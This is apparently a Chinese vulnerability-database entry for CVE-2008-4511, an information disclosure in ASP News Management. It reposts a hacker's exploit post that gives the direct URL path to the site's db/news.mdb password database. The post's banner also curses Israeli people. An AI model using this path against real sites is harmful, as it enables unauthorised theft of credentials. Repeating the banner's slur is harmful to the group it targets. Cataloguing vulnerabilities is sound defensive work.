todd_woolums asp_news_management 权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1185027 漏洞类型 权限许可和访问控制
发布时间 2008-10-09 更新时间 2008-10-09
CVE编号 CVE-2008-4511 CNNVD-ID CNNVD-200810-137
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/84776
https://cxsecurity.com/issue/WLB-2008100138
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-137
|漏洞详情
ToddWoolumsASPNewsManagement中,把db/news.mdb储存在web根目录下,但没有给与充分的访问控制,远程攻击者可以通过提交一个直接的请求来获得敏感信息。
|漏洞EXP

########################################################################
############################
# ASP News Remote Password Disclouse Vulnerability                                                 #
# ? Ghost Hacker , Real Hack Back                                                                  #
########################################################################
############################
#[~]Author : Ghost Hacker                                                                          #
#[~]My Home : www.Real-h.com [ Real Hack Back  ]                                                   #
#[~]Contact Me : Ghost-r00t (at) Hotmail (dot) com [email concealed]                                                            #
#[~]Bug : Remote Password Disclouse                                                                #
#[~]From : Kingdom Saudi Arabia (KSA)                                                              #
#[~]Name Script : ASP News                                                                         #
#[~]Download : http://www.toddwoolums.com/aspnews.asp                                              #
########################################################################
############################
#[~] Dork :                                                                                        #
# ;)                                                                                               #
#[~]Exploit :                                                                                      #
# http://xxxx.com/[Script]/db/news.mdb                                                             #
########################################################################
############################
#[~]Greets :                                                                                       #
# Mr.SQL , Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz , L&J TeaM      #
# HitleR 07 , D3is Hacker , RoMaNcYxHaCkEr , Mr.PaTcH , Mr.MN7oS , Mr.Hope , EgYpTiaN x HaCkEr     #
# All Members Real Hack and Members Arab Security , All My Friends !                               #
########################################################################
############################
#[~]Fuck :                                                                                         #
# All kidz Hackers , All my Traitors , Israeli people !                                            #
########################################################################
############################
# I love the Messenger of Allah Mohammad                                                           #
########################################################################
############################
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
|受影响的产品
Todd Woolums ASP News Management 2.21 Todd Woolums ASP News Management 0
|参考资料

来源:XF
名称:aspnewsmanagement-news-info-disclosure(45838)
链接:http://xforce.iss.net/xforce/xfdb/45838
来源:BUGTRAQ
名称:20080927ASPNewsRemotePasswordDisclouseVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/496787/100/0/threaded
来源:SREASON
名称:4380
链接:http://securityreason.com/securityalert/4380